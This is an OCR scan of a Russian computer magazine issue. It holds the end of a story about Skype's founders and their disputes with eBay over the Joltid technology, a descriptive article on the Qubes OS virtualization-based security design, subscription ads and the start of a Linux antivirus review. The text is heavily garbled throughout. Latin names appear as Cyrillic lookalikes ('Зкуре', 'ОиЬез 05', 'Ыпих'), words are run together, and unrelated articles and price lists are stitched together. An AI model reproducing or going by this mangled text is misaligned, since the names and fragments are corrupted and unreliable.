ТР0ЛЛИНГ 

Теперь, после освещения всевозможных 
технологических аспектов работы Зкуре, 
можно поговорить и о более забавных вещах 
— на десерту нас остались самые настоя- 
щие «скандалы, интриги, расследования». 
Как и было обещано, вернемся кличнос- 
тям Никласа Зеннстрема и Януса Фрииса 
и рассмотрим их поближе. Зеннстрем — 
выпускникУппсальского университета, 
обладатель степеней бакалавра в области 
делового администрирования и магистра в 
области физики. Фриис, напротив, не может 
похвастаться «вышкой», так как в свое вре- 
мя бросил школу и ушел работать в техпод- 
держку местного провайдера. 



Та к уж сложилось, что в самом начале 
жизненного и карьерного пути эти двое 
устроились на работу в шведскую телеком- 
муникационную компанию Те Іе2, где в 1 996 
году их и свела судьба. Проработав бок о 
бок несколько лет, Зеннстрем иФриистак 
спелись, что уже в 2000 году решились уво- 
литься и начать свой собственный бизнес, 
которым и стала файлообменная сеть Ка2аА. 
Фактически, для ее разработки Фриис и 
Зеннстрем переехали в Амстердам, наняли 
команду программистов, а сами предпочли 
остаться на руководящих должностях. 
Однако с «Казой» вышел казус — не успело 
детищеФрииса и Зеннстрема набрать 
обороты, как на пиринговые сети начались 
активные гонения. Как раз тогда закрылся 
легендарный Ыарзіег, а свято место, как 
известно, пусто не бывает — весь нелегаль- 
ный контент потек в другие сети, одной из 
которых и была Ка2аА. Копирасты тутже 
принялись осаждать наших горе-бизнес- 
менов, желая утопить их в судебных исках, 
и такое положение вещей новоиспеченным 
стартап ерам пришлось совсем не по душе. 
Зеннстрем и Фриис были вынуждены за- 
секретить нахождение офисов компании и в 
самом буквальном смысле удариться в бега, 
скрываясь от повесток, сыпавшихся как из 
рога изобилия. 

Когда стало окончательно ясно, что пого- 
ворка «время лечит» на данную ситуацию 
не распространяется, и становится только 
хуже, от Ка2аА решено было избавиться. 
Была проведена странноватая сделка, в 
ходе которой Ка2аА отошла австралийской 
компании Збагтап Ыеіѵѵогкз, зарегист- 
рированной на тихоокеанском островке 
Вануату. Однако кое-что тогда не вошло в 
состав этой сделки, кое-что очень важное 
— права и патенты на пиринговую техно- 
логию, которая использовалась в Ка2аА. 

Эти права остались в руках Зеннстрема и 
Фрииса, а точнее их новой ко мпанииЭоШсІ, 
зарегистрированной вообще на Британских 
Виргинских островах. 

Ты уже наверняка понимаешь, что все эти 
подробности здесь приведены неспроста. 
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Дело в том, что впоследствии именно эта 
технология и была использована при созда- 
нии Зкуре. 

Кстати, если говорить о роли Фрииса и 
Зеннстерма в создании Зкуре, то здесь 
все обстояло уже знакомым нам образом 
— наемные программисты (те же самые 
эстонцы, которые корпели над Ка2аА] и 
двое неразлучных стартаперов в роли 
основателей проекта. Хотя, справедливости 
ради здесь нужно отметить, что Зеннстрем 
был верен Зкуре и оставался на посту СЕО 
вплоть до 2007 года, то есть еще на протя- 
жении двух лет после продажи компании 
аукциону еВау. 

Итак, еВау. Какуже было сказано выше, 
в 2005 году, спустя всего два года после 
создания Зкуре был продан компании еВау 
за баснословную сумму — 2,6 миллиардов 
долларов плюс еще 1 ,5 миллиарда через 
несколько лет, если финансовые показатели 
Зкуре будут хорошими (это было крупнейшее 
приобретением е Вау за всю историю аук- 
циона]. Оба — и Фриис, и Зеннстрем, тогда 
в одночасье стали миллиардерами и, каза- 
лось бы, могли спокойно радоваться жизни, 
начинать и продвигать другие проекты, 
заниматься инвестициями и просто тратить 
те самые миллиарды. Ноне тут-то было. 
Выждав четыре долгих года после соверше- 
ния сделки и успев за это время запустить 
стартап 0 оозі:, расчетливая парочка решила, 
что хватит наблюдать за развитием Зкуре со 
стороны. А развитие, кстати, было налицо: 
количество пользователей выросло с 53 
до более чем 400 миллионов, междуна- 
родный трафик Зкуре в 2008 году составил 
рекордные 33 миллиарда минут, только вот 
желанных денег е Вау все это не приносило. 
Атак как прибыли от Зкуре составляли куда 
более скромные суммы, нежели планирова- 
лось изначально, в 2009 году крупнейший 
аукцион планеты решил избавиться от 
приобретения, заявив, что намерен опять 



выделить Зкуре в отдельную компанию и 
выставить его акции на биржу. Это сооб- 
щение заставило Фрииса и Зенн стрема 
внезапно активизироваться. 

Мало кто изначально понимал, зачем 
еВау вообще покупал Зкуре (слишком уж 
неубедительно звучали официальные 
заявления: «для удобства общения между 
пользователями аукциона»), нотолько в 
2009 до широкой общественности дошел 
весь комизм ситуации. Оказалось, что при- 
обретя сам Зкуре, еВау умудрился оставить 
права и патенты на приснопамятную клю- 
чевую технологию в руках ее предыдущих 
владельцев. Да-да, Фрииса и Зеннстрема 
в лице компании ЗоШсІ. А владельцы, узнав 
о грядущем выставление Зкуре на биржу, 
развили бурную деятельность, принявшись 
возвращать проданное назад. Так, газете 
Ыеѵѵ Уогк Тітез, например, слили слух о том, 
что бывшие владельцы Зкуре уже успели 
подрастратить свои миллиарды и теперь 
вынуждены общаться с частными инвесто- 
рами, пытаясь найти недостающую часть 
суммы для совершения «обратной» сделки. 
Болеетого, сообразительные бизнесмены 
тутже сделали «предупредительный вы- 
стрел» — так как еВау все это время работал 
с ЗоіЫсІ по лицензии, Фриис и Зеннстрем по- 
дали в суд соответствующий иск, собираясь 
аннулировать действие этой лицензии в 
Великобритании. Для начала. 

Взаимный шантаж и выпады в сторону 
друг друга длились без малого полгода. За 
это время еВау, как бы в ответ на пред- 
ложение Зеннстрема и Фрииса выкупить 
свое детище, успел продать 65% акций 
Зкуре группе инвесторов Апсігеевзеп 
Ногоѵѵііг за 2 млрд, долларов. Находчивые 
бизнесмены тутже снова подали в суд, 
теперьуже на новых владельцев Зкуре, 
обвиняя их в нарушении патентов и требуя 
по $75 млн. за каждый день «нелегальной» 
работы сервиса. Аукцион, который Фриис 



и Зеннстрем также не оставляли в покое 
(еще бы, у еВау все еще оставалось 35% 
акций!], подал встречный судебный иск 
против ЭоШсІ с целью запретить компа- 
нии использование технологии, лежащей 
в основе Зкуре. Понимая, что процесс, 
вероятно, выиграть не удастся, предста- 
вители еВау на всякий случай заявили о 
своей готовности переписать Зкуре с нуля, 
если понадобится. 

Конец всему этому цирку наступил совсем 
недавно, в ноябре 2009 года. Какэто ни 
удивительно, ситуация все же разрешилась 
миром. еВау, до этого категорически отказы- 
вавшийся выплачивать что-либо экс-вла- 
дельцам Зкуре, в итоге все же согласился 
на сделку. В накладке Зеннстрем и Фриис 
не остались, они не только снова получили 
места в совете директоров, но и урвали 1 4% 
акций компании Зкуре. Вся соль ситуации в 
том, что раскошеливаться им не пришлось 
— еВау согласился на их условия вобмен на 
отказ от исков и лицензирование принадле- 
жащей им интеллектуальной собственности. 
Мы, конечно, никогда не узнаем, каков был 
изначальный план Зеннстрема и Фрииса, 
и существовал ли он вообще. Вполне воз- 
можно, что они представляли себе «воз- 
вращение в Зкуре» несколько иначе, так 
сказать, в более радужном свете. Возможно, 
права придерживались ЭоШсІ в рукаве для 
более подходящего случая, а решение еВау 
избавиться от Зкуре форсировало события. 

С другой стороны может статься, что Фриис 
и Зеннстрем и вовсе не замышляли ничего 
криминального, хотя очень сложно пове- 
рить в то, что права на ключевую технологию 
остались у них «нечаянно», а компания 
ЗоШсІ по чистой случайности была открыта в 
оффшорной зоне. 

После вышеописанного резонно будет 
задаться вопросом: «что же будет со Зкуре 
дальше?», ведь хотя дележка и оконче- 
на, нельзя сказать, что все идет совсем 
уж безоблачно. Нет-нет, да попытаются в 
какой-нибудь стране запретить софтфон 
или подадут на компанию в суд (в последнее 
время на Зкуре очень нехорошо косятся 
телекоммуникационные и сотовые опера- 
торы сразу ряда стран, включая Россию]. 
Впрочем, это связано не столько с самим 
Зкуре, сколько с ѴоІР-телефонией в целом — 
в последней ОПСоСы и Ко в силу паранойи 
часто видят конкурента, вредителя и врага 
номер один. Пожалуй, в отношении будуще- 
го Зкуре точно можно сказать следующее: 
од ин из самых популярных и успешных ѴоІР- 
сервисов, которым пользуется несколько 
сотен миллионов человек, не может просто 
так сгинуть в лету, что бы ни случилось. А 
уж если в отцах-основателях этой софти- 
ны к тому же числятся два таких хитрых и 
упорных типа, как Никл а с Зеннстрем и Янус 
Фриис, Зкуре не только не пропадет, но, 
скорее всего, найдет более удачные пути 
монетизации и увеличения прибылей. ~іг 
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Младене 
с лицом уоиицы 

Изучаем внутреннее устройство ОиЬе$ 05 - 
самого безопасного дистрибутива Ыпих 




По-настоящему защищенных операционных систем не существует. 
Какие бы меры по повышению безопасности не предпринимали 
разработчики ОС, всегда остается вероятностьтого, что в их коде будет 
найдена ошибка, которая позволитобойти механизмы защиты. Однако 
прогресс не останавливается, и в противовес более изощренным атакам 
появляются более совершенные методы защиты. ОиЬез 05 — пример 
того, как могут выглядеть эти методы в современном мире. 



ЗАЧЕМ ИЗОБРЕТАТЬ 
ВЕЛОСИПЕД? 

Чтобы понять, почему появиласьна светОибез 
05, и что она может дать в плане безопасности, 
мы должны углубиться в историю вопроса и выяс- 



нить, чемже плохи современныеоперационные 
системы. Существуеттри наиболее эффективных 
метода обеспечения безопасности на уровне ОС: 
• Формальное доказательство правильности и 
безопасности кода; 



• Быстрое и своевременное решение выявлен- 
ных проблем безопасности; 

• Изоляция исполняемого кода (на уровне 
процессов и ядра]. 

Первый метод подразумевает полную 
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КТО ОНА? 



Джоанна Рутковска известна благодаря двум вещам. Во-первых, 
она является создателем нашумевшего и оченьтрудного в отлове 
руткита Віие РШ. [ ШрУ/ЫиеріІІргоіесГогд ). который использует 
механизм аппаратной виртуализации для того, чтобы поместить 
всю ОС в виртуальную среду и вертеть ею, как вздумается. За это 
журнал еѴѴеек [ ЬДрѴ/еѵѵеек.огс ) поместил ее в пятеркухакеров, 
оставивших след в 2006 году (Ріѵе Наскегзѵѵбо РіДа Магкоп2006]. 
В 2009 году совместно с НаМѴѴофсгикона раскрыла способатаки 
аппаратных механизмов защиты процессоров ІпІеІТХТ и Іпіеі 
Бузует Мападетепі Мобе (5ММ). Сегодня ей принадлежит ком- 
пания ІпѵізіЫеТЫпдз ЕаЬз [ ЬирУ/іпѵізіЫеіЫпдзІаЬ.сот ]. которая 
занимается исследованиями в области безопасности операцион- 
ных систем и систем виртуализации. 




і і 

проверку всего кода операционной системы (включая ядро и поль- 
зовательское ПО) и математическое доказательство того, что резуль- 
тат исполнения программы при любыхусловиях будет полностью 
соответствовать ожидаемому, а во время ее исполнения не произойдет 
непредвиденных ситуаций. Это — «святой грааль» для современных 
исследователей операционных систем (а также спецслужб всего мира). 
Однако, если брать в расчет неимоверную сложность сегодняшних ОС 
и количество оборудования, на котором они могут функционировать 
(необходимо доказать правильность работы ПО на любой аппаратной 
конфигурации), можно сказать, что на деле формальное доказательст- 
во безопасности всего кода ОС невозможно. За все время это удалось 
сделать лишь в отношении весьма скромных по размеру микроядер 
исследовательских ОС. 

Некоторые разработчики предпочитают более простую проверку, 
полагаясь на свой опыт и не очень сложные инструменты (Ріаѵѵбпбег, 



КАТ5, Зкаѵепдег, Ііпіит.д.). Например, разработчики ОрепВЗО добились 
высокой безопасности ядра своей ОС во многом благодаря тому, что 
подвергают сомнению и тщательной проверке любой патч, предла- 
гаемый квключению в ОС. Разработчики Соѵегііу используют в своей 
системе (Соѵегйу Ргеѵепі) довольно простые, но не слишком эффек- 
тивные методы определения ошибок в коде. Третьи используют второй 
метод обеспечения безопасности и вместо тщательной проверки кода 
(которая требует внушительных затрат времени и средств) предпочитают 
своевременно и быстро выпускатьобновления, решающие найден- 
ные проблемы в стабильности и безопасности. Сегодня эта практика 
распространена повсеместно и применяется всеми, начиная М ісгозоГі: 
и заканчивая разработчиками В50-систем. Однако проблема метода 
в его запоздании. Зачастую первыми о баге узнают не разработчики 
ОС, а лица, приближенные к им пер... человеку, на шедшему уязвимость. 
Поэтому еще до выхода багфикса поломанными оказываются сотни и 
тысячи машин. 

Чтобы уменьшить ущерб от взлома, применяется изоляция кода. 
Современные процессоры предлагают механизм аппаратной за- 
щиты памяти, позволяя ядру и процессам пользователя работать 
в обособленных участках памяти и оберегая их друг от друга. Если 
взломанным оказывается один из пользовательских процес- 
сов, ядро остается в сохранности, а благодаря механизму прав 
доступа взломщик не получает контроль над всей ОС (если только 
взломанный сервис не работал справами гооі). Это достаточно 
эффективный метод изоляции, но не стоит полностью полагаться 
только на него. Многие сервисы просто не могут быть запущены с 
правами рядовых пользователей, поэтому их взлом повлечетза 
собой компрометацию всей ОС, а ошибки в самом ядре ОС могут 
быть использованы для получения прав администратора, даже 
в том случае, если сервис работал от пользователя поЬобу и был 
изолирован с помощью БЕЫпих или ВЭО^іІ.Аесли проник- 
новение произойдет через стандартное пользовательское ПО 
(веб -браузер, к примеру), то под угрозой окажутся все остальные 
пользовательские приложения и их данные (однако этого можно 
избежать, используя разные учетные записи для различных 
целей : покупки совершать под одним пользователем, переписку с 
друзьями вести поддругим ит.п.). 

ИЗОЛЯЦИЯ БОЛЕЕ НИЗКОГО УРОВНЯ 

Получается, что наибольшую угрозу безопасности несетвовсе не ПО, 
работающее в пространстве пользователя, а ядро операционной систе- 
мы. Сложное, огромное по размерам и количеству подсистем и драй- 
веров монолитное ядро современной ОС — просто кладезь неоткрытых 
уязвимостей. Проникновение с использованием уязвимости в ядре дает 
взломщику абсолютную свободу, а простая ошибка — к падению всего и 
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вся. Об этом всем нам долго и упорно повторял Эндрю Таненбаум, говоря 
о преимуществе микроядерных ОС с их разделением ядра на привиле- 
гированное микроядро и вынесением всех остальных подсистем (таких 
какдрайвера, ФС Р сетевой стек и даже менеджер памяти] в отдельные 
процессы. Не послушались, производительность оказалась дороже 
(микроядра несколько притормаживают), и сегодня все популярные ОС 
основаны на монолитном ядре. 

Однако возможности современных процессоров позволяют 
перенести механизм изоляции еще глубже, который подразуме- 
вает использование виртуальных машин, работающих ниже ядра 
операционной системы. В этом случае можно использовать любые 
классические ОСине беспокоиться о том, что ошибка в ядре будет 
использована для проникновения в виртуальную машину. Во-пер- 
вых, ВМ может быть легко возвращена в предыдущее состояние, 
а во-вторых, никак не повлияет на другие виртуальные машины и 
их операционные системы. Этот подход уже давно используется 
провайдерами облачных вычислений. Но может ли тот же самый 
механизм быть применен для создания безопасной ОС для повсед- 
невного использования? Как о казал ось— да. 



ВСТРЕЧАЙТЕ: СШВЕ5 05 

ОиЬез 05 ( ЬирУ/диЬез-оз.огд ) — это дистрибутив Ыпих (если в дан- 
ном случаетакое понятие вообще применимо], разрабатываемый под 
руководством небезызвестной Джоанны Рутковской Доаппа Виікоѵѵзка], 
польского специалиста по безопасности. Основная идея ОиЬез 05 в 
повсеместной изоляции на уровне виртуальных машин, при помощи 
которых осуществляется отделение пользовательских приложений от 
базовой ОС. 

Сердце операционной системы — гипервизорХеп ( ѵѵѵѵѵѵ.хеп.огд ). 
используемый для запуска виртуальных машин, каждая из которых рабо- 
тает под управлением ядра Ыпих, набора стандартных служб, приложе- 
ний уровня пользователя (их набор и количество может быть разным] и 
мультиплексирования ресурсов компа между ВМ. На рисунке «Архитек- 
тура ОиЬез 05» показана базовая архитектура ОС. Каждое приложение 
(или набор приложений) запускается внутри обособленных виртуальных 
машин, четко отделенных друг от друга с помощью гипервизора. Для 
повышения безопасности весьсетевой код (включая сетевые драй- 
вера, стекТСР/ІР, ОНСР-клиент и т.д.] работает в рамках отдельной 
виртуальной машины, также каки коддрайверов накопителей. Это 
возможно благодаря технологии виртуализации устройств I п1;еІ ѴТ-сІ . Так 
называемая корневая виртуальная машина (ЭотО в терминологии Хеп] 
используется для запуска всех остальных драйверов, системы ХѴѴіпбоѵѵ, 
графического менеджера окон и набора административныхутилитдля 
запуска приложений (виртуальных машин]. 

За счетХеп создателям ОиЬез 05 удалось отодвинуть механизм изоля- 
ции исполняемого кода гораздо ниже, чем это сделано в классических 



зиложения, запущенные в разных домена 



операционных системах. В этой модели уязвимым местом становится 
не ядро операционной системы, а гипервизор, код которого в сотни 
раз меньше и гораздо проще (а значит, надежнее] кодовой базы ядра 
Ыпих. Механизмы обмена информацией между виртуальными маши- 
нами также намного более просты, чем их многочисленные аналоги для 
коммуникации между стандартными процессами в ядре ОС, атехнология 
I п1;еІ ѴТ-сІ , позволяющая вынести коддрайверов в отдельные виртуаль- 
ные машины, позволяет изолировать ненадежные, сточки зрения 
безопасности, драйвера. 

ДОМЕНЫ ПРИЛОЖЕНИЙ 

Все программы пользователя ОиЬез 05 запускает внутри выделенных 
виртуальных машин, такназываемыхдоменов приложений. Каждый 
из них работает под управлением полноценного дистрибутива Ыпих и 
потому кушает ресурсы весьма усердно. Чтобы свести к минимуму общую 
нагрузку на систему, ОиЬез 05 использует несколько техник: 

• ОиЬез 05 используетаппаратную поддержку виртуализации современ- 
ных процессоров (режим Хеп НѴМ], а это значит, что производительность 
ОС, запущенной в рамках виртуальной машины, почти вплотную прибли- 
жается к производительности ОС, работающей на «голом»железе. 

• ОиЬез 05 опирается на семантическое разграничение прав приложе- 
ний, а это значит, что вместо того, чтобы помещать каждое приложение в 
отдельную виртуальную машину, ОС группирует их в рамках нескольких 
виртуальных машин по назначению и уровню доступа конфиден- 
циальной информации. Например, пользователь может создать домен 
Епіегіаіпппепі: и использовать его для отдыха: запускать в нем аудио и ви- 
деоплееры, ходить по одноклассникам и ѴоиТиЬе. Домен под названием 
5Ьорріпд можетбыть использован для покупок в интернет-магазинах. 
Домен Вапкіпд — для интернет-банкинга и работы с пластиковыми кар- 
тами. Смысл втом, что даже втом случае, если пользователь подцепит 
какую-нибудь гадость через одно из приложений домена Епіегіаіпппепі;, 
его конфиденциальные данные, хранящиеся в доменах5Ьорріпд и 
Вапкіпд, останутся в сохранности. Это разумный компромисс, который 
позволяет существенно снизить потребление оперативной памяти (даже 
современный комп не потянул бы ОиЬез 05, если бы каждое ее приложе- 
ние работало на отдельной ВМ]. 

• Для сохранения дискового пространства все домены приложений 
используют одну общую файловую систему. Домен хранилища, о котором 
пойдет речь в одноименном разделе статьи, хранит доступный только 
для чтения образ корневой файловой системы Ыпих. На его основе для 
каждого домена приложений создается устройство сору-оп-ѵѵгке (это 
возможно благодаря механизму Оеѵісе Маррег). Домен приложений 
монтирует файловые системы корневого образа и СОѴѴ-устройства к 
корневому каталогу. Дополнительно для каждого домена приложений 
внутри домена хранилища создается образ для хранения приватных 
данных (каталоги /Ноте, /изг/іоса I, /ѵа г] . Содержимое СОѴѴ-устройства и 
образа приватных данных шифруется с помощью ШК5 (ТЬе Ыпих ІІпіЬесІ 
Кеу 5е1:ир], а ключ передается соответствующему домену приложений 
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и административному домену. Благодаря такой схемеудается исполь- 
зовать один образ корневой ФС для всехдоменов приложений и втоже 
время обеспечить его сохранность от модификации. Шифрование 
позволяет обезопасить да иные доменов приложений на тот случай, если 
взломщик прон икнет в домен хранилища. 

АДМИНИСТРАТИВНЫЙ ДОМЕН 

Административный домен (Хеп БотО] — наиболее привилегированный 
компонентой без 05. Он отвечает за управление доменами приложе- 
ний, а его полномочия фактически равны полномочиям гипервизора. 

По этой причине административный домен сохранен максимально 
простым: пользователь не может за пускать приложения в его рамках, 
а весь низкоуровневый код, участвующий в обмене данных с внешней 
стороной (сетевые драйвера, стекТСР/ІР, БНСР-клиент, брандмауэр, 
драйвера накопителей и т.д.), вынесен в обособленные домены: сетевой 
домен и домен хранилища. 

Внутри административного домена работа юттолько два компонента ОС: 
демон ХепБіоге, используемый для хранения информации о доменах, и 
01Л -подсистема, основанная на оконной системе ХѴѴіпбоѵѵ и окружении 
рабочего стола КБЕ (нетсмысла выносить ее в отдельный домен, потому 
что, получив доступ к ОШ, взломщикавтоматически получит доступ ко 
всемдоменам приложений]. 

Графическая среда — одно из главных достижений разработчиков 
ОиЬез 05. Она нетолько предоставляет пользователям удобное и 
современное графическое окружение с применением ЗБ-эффектов, 
но и создает иллюзиютого, что все приложения исполняются в рамках 
одной (виртуальной] машины. Приложения имеют собственные окна, 
и единственное, что отличает графический интерфейс ОиЬез 05 от 
стандартного рабочего стола — это разноцветные рамки, обрамляющие 
окна. Так ОС отмечает виртуальные машины, в которых исполняется 
приложение. Без них пользователь мог бы сделать ошибку и ввести 
свои конфиденциальные данные не втом окне (приложение, которое 
предназначено для хождения по «одноклассникам», а не для работы с 
кредитными картами, например]. 

СекретѲШ кроется в специальном демоне и собственном Х-сервере (с 
«заглушкой» вместо видеодрайвера], работающим внутри каждого до- 
мена приложений. Когда происходит создание нового окна (или изме- 
нение содержимого существующего], демон получает его содержимое с 
помощью стандартной функции ХОеіІтаде системы ХѴѴіпбоѵѵ и, исполь- 
зуя Хеп Піпд ЬиТСегргоІосоІ, отправляетего административному домену. 
Получив изображение, приложение АррѴіеѵѵег, работающее внутри 
административного домена, производит его отри совку с помощью 
функции ХРепсІегСотрозіІе. 

Графический интерфейс ОиЬез 05 не только реализует модель обособ- 
ленных окон для приложений, но и позволяет производить копирование 
и вставку между окнами приложений, а в будущем планируется реализа- 
ция поддержки аудио. 



СЕТЕВОЙ ДОМЕН 

Сетевой код операционной системы представляет реальную опасность 
для ее пользователей. В то время как возможный баг в стеке протоколов 
ТСР/ІР, который отлаживался годами, очень маловероятен, опасная 
ошибка вдрайвередля новой ѴѴіРі-карточки — нетакаяужи редкость, 
какэто может показаться на первый взгляд. Через эксплуатацию дыры 
в сетевом драйвере взломщиксможет получить полный контроль над 
ядром, а значит и над всей операционной системой. 

По этой причине код всех сетевых драйверов в ОиЬез 05 (ЫеЬ/ѵогк 
Оотаіп] вынесен в отдельную виртуальную машину, называемую сете- 
вым доменом. В отличие от доменов приложений, он не разделяет 
общую корневую файловую систему с другими доменами, а вместо 
этого использует простое Ыпих-окружение, состоящее из брандмауэра, 
нескольких сетевыхутилит и библиотек, нужных для их работы. 

Есть только три вещи, которые сможет сделать взломщик, проникнув 
в сетевой домен: прослушивать трафик других доменов, попытаться 
произвести инъекцию собственных пакетов в этоттрафик или же 
просто обрушить домен. В любом случае все это не приведет к ка- 
тастрофическим последствиям, потому кактрафик важных доменов, 
имеющих доступ к конфиденциальной информации, обычно шиф- 
руется, а трафик непривилегированного домена приложений, такого 
как Епіегіаттепі, защищать просто не имеет смысла. В случае же 
остановки сетевого домена его будет легко вернуть к последнему 
непротиворечивому состоянию (такая функциональность встроена в 
ОиЬез 05]. 

Каждый домен приложений получает доступ к сетевому оборудова- 
нию через виртуальный сетевой интерфейс, который Хеп создает для 
каждой виртуальной машины. Внутри домена приложений он имеет 
стандартное имя еіЬО. На стороне сетевого домена этот виртуальный 
интерфейс отображается в интерфейс ѵіГК.У, где X — это идентифика- 
тор до мена, аУ— номер интерфейса. Обычно при создании виртуаль- 
ных окружений на основе Хеп все эти интерфейсы ѵТХ.У соединяются 
с физическим интерфейсом (например, ѵѵІапО] в конфигурации 
Ьгібде, так что каждая ВМ имеет доступ не только к физическому 
интерфейсу, но и ко всем другим ВМ. Для ОиЬез 05, ставящей во 
главу стола безопасность, такая схема неприемлема. Поэтому во 
время своего запуска и запуска доменов приложений сетевой домен 
не просто подключает виртуальные интерфейсы к физическому, но и 
настраивает брандмауэр так, чтобы домены приложений не смогли 
получить доступ друг к другу. 

ДОМЕН ХРАНИЛИЩА 

В современных ОС код, отвечающий за работу с накопителями, не менее 
комплексный, чем сетевая часть. Он включает в себя код драйверов 
устройств, реализацию протоколов АТА и 5051, Ю5В-стек, код демонов 
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уровня пользователя. Каждый из этих компонентов может дать сбой или 
привести к взлому. Для запуска всего этого кода ОиЬез 05 использует 
выделенную виртуальную машину, называемую доменом хранилища 
(5іогаде Оотаіп). 

В рамкахдомена хранилища работаетвесь код драйверов устройств 
хранения и все необходимые для их работы подсистемы ядра и демоны 
уровня пользователя. Также он отвечаетза хранение образов корневой 
файловой системы І_іпих, образов для хранения приватных данных 
доменов приложений и файлов, необходимых для загрузки ОС (загрузоч- 
ный раздел]. Чтобы обезопасить эти данные оттех, кто смог проникнуть в 
домен хранилища, используются различныетехники: 

• Образы приватных данных доменов приложений шифруются. При этом 
ключ шифрования известен только соответствующему домену приложе- 
ний и административному домену. 

• Образ корневой файловой системы защищается от модификации с 
помощью цифровой подписи, ключ которой известен только админи- 
стративному домену. Если этотобраз будет модифицирован, операцион- 
ная система сообщитоб этом пользователю. 

• Защита загрузочных файлов ОС осуществляется с помощью доверен- 
ного механизма загрузки, основанного натехнологии I пЕеІ ТХТ. Этозна- 
чит, что, если загрузочные файлы будут модифицированы, операционная 
система просто не сможетзагрузиться. 

Единственное, что сможет сделать взломщик, завладев доменом хра- 
нилища, это вывести его из строя. Однако, какуже было сказано в преды- 
дущем разделе, вышедший из строя домен Хеп достаточно легко вернуть 
к предыдущему состоянию. 

ПРОЦЕСС ЗАГРУЗКИ 

Процесс загрузки ОиЬез 05 можно условно разделить на семь эта- 
пов: 

1 . Первый шаг включает в себя проверку подлинности файлов, 
необходимых для загрузки гипервизора и административного 
домена (небылилиони повреждены или модифицированы]. Она 
осуществляется с помощью технологии ІпіеІТХТ (ТгизіесІ ЕхесиЬоп 
Тес Ь по Іоду]. Если проверка прошла успешно, то в следующих шагах 
ОС сможет получить доступ к ключам шифрования дисков из аппа- 
ратного модуля ТРМ (ТгизІесІ РІаіТогт Мобиіе]. 



2 . Далее происходит загрузка и запуск гипервизора, ядра админист- 
ративного домена и скрипта инициализации іпИтаті'з. Это происхо- 
дит вне зависимости от результата проверки на первом этапе, одна- 
ко, если проверка дала ложный результат, ОС не сможет произвести 
загрузку остальных своих частей, так как не получит от ТРМ ключей 
шифрования. 

3. Скрипт іпИтатіъ запрашивает у пользователя пароль, который 
может быть введен вручную или хранится на карте памяти. Этот шаг 
необходим для того, чтобы только авторизованный пользователь 
смог получить доступ ксистеме. Если подлинность загрузочных 
файлов была подтверждена на первом шаге, и пользователь ввел 
правильный пароль, система может расшифровать файл кеуз.дрд, ко- 
торый содержит ключи, необходимые для следующих этапов загрузки. 

4 . После расшифровки файла кеуз.дрд скрипт іпііігатбз может присту- 
пить к созданию домена хранилища. 

5 . ОиЬез 05 создает новую виртуальную машину для домена хранили- 
ща и подключает к ней его корневую ФС, зашифрованную с использо- 
ванием ключа, хранящегося в файле кеуз.дрд. 

6. Домен хранилища монтирует другой раздел, который используется 
для хранения образов корневых ФС и приватных данных доменов при- 
ложений. Теперь скрипт іпіітаітбз может смонтировать свою корневую 
файловую систему, запустить сетевой домен, систему ХѴѴіп б оѵѵ, окру- 
жение рабочего стола и таким образом завершить процесс загрузки. 

7 . Система загружена и инициализирована. Теперь пользователь 
может запускать приложения. 

Все эти этапы наглядно показаны на диаграмме «Процесс загрузки 
ОиЬез 05». 

выводы 

ОиЬез 05 оказалась намного проще, чем этого можно было ожидать от 
по-настоящему безопасной операционной системы. По сути, она не 
приносит вмирОСничего кардинального нового, но показывает, что 
жесткая изоляция может применяться нетолько в отношении серве- 
ров, для сопровождения которых нужен грамотный администратор, и 
исследовательских ОС, таких какОіпдиІагТу (ЬирТ/гезеагсЬ.тісгозоН. 
сот/еп-из/рго]ес1:5/5ІпдиІагіІу/), но и в отношении ОС для рядовых 
пользователей. И это действительно большой шаг вперед. □с 
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подпишись 

зНор.діс.ш 



Подписка - это: 

■ Выгода ■ Гарантия ■ Сервис 



СТРАНА 



ИГР 




іВ 

2 

ш 

< 

о 




выходит 2 раза в месяц 

1 2 номеров 2400 руб. 
24 номера 4400 руб. 



б номеров 1 300 руб. 
1 2 номеров 2300 руб. 



ТѢ йІЮХРЕРТ 



т>уо 





б номеров 912 руб. б номеров 1080 руб. 
12 номеров 1656 руб. 12 номеров 1960 руб. 




6 номеров 1 200 руб. 
1 2 номеров 2200 руб. 





ОІдКаІРИоЮ МАСТЕРСКАЯ 



ХѴИИГ/ІН 



СВШЗНЕС 





6 номеров 1200 руб. 
1 2 номеров 21 00 руб. 



б номеров 1 200 руб. 
1 2 номеров 21 00 руб. 






6 номеров 990 руб. 
12 номеров 1790 руб. 



ё 

Ш 

< 



6 номеров 726 руб. 6 номеров 600 руб. 

12 номеров 1320 руб. 12 номеров 1080 руб. 





зіфазз 



Моипіаіп 



МаМаІ 



Вышиною 

—ирестиком 



Вышиною»» л, • 
-«рестиком 





только на сайте 

2 номера 284 руб. 




4 номера 556 руб. 6 номеров 774 руб. 

8 номеров 1008 руб. 12 номеров 1404 руб. 




б номеров 564 руб. 
13 номеров 1105 руб. 



6 номеров 450 руб. 
1 3 номеров 975 руб. 







1 2 номеров 3720 руб. 



1 2 номеров 3744 руб. 



б номеров 31 50 руб. 
1 2 номеров 5580 руб. 



(дате)іамі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 





















ІШІХОЮ 



Юрий «Асіері» Видинеев асІерІдШдтаіІ.сот 



л 



Плаце 





г 



Тестиров ле антивирусов для Ыпих 



Задавался ли ты хоть раз вопросом, нужен для 
Иіп их антивирус или нет? Немало копий было 
сломано в бесконечных спорах, и вот, ответ, 
вроде бы, очевиден — конечноже, нужен! 
Нотолько если надо искать виндовые вирусы. 






\ 




Казалось бы, можно считать за аксиому, что 
если на платформе есть вирусы — то нужен и 
антивирус. Но с Ыпих не все та к просто. Да, 
вирусы под Ыпих есть, но в 99% случаев — это 
черви, умеющие эксплуатировать одну- 
единственную уязвимость в конкретном сер- 
висе и, как правило, конкретном дистрибутиве 
(так как версия сервиса, настройки, да и пара- 
метры компиляции меняются от дистрибутива 
кдистрибутиву). Хорошим доказательством 
этого факта может служить, например, Ыпих. 
Натеп (использующий уязвимости в ѵѵи-^рб 
на Неб Наі: 6.2 и 7.0], макрочервь ВабЬиппудля 
ОрепОШсе или тот же червь Морриса. 

Однако практически у каждого производителя 
антивирусов есть версия под Ыпих. Правда, чаще 
всего это версия для почтового сервера, шлюза 
или общего файлохранилища, для защиты виндо- 
вых клиентов. Но в последнее время начало расти 
количество антивирусов для Ыпих-десктопа. И 
производители соответствующих продуктов пугают 
«прибывающим в геометрической прогрессии 
количеством малвари под Ыпих». Использовать 
или нетантивирус на Ыпих-десктопе — личное 



дело каждого. По мне — так пока популярность 
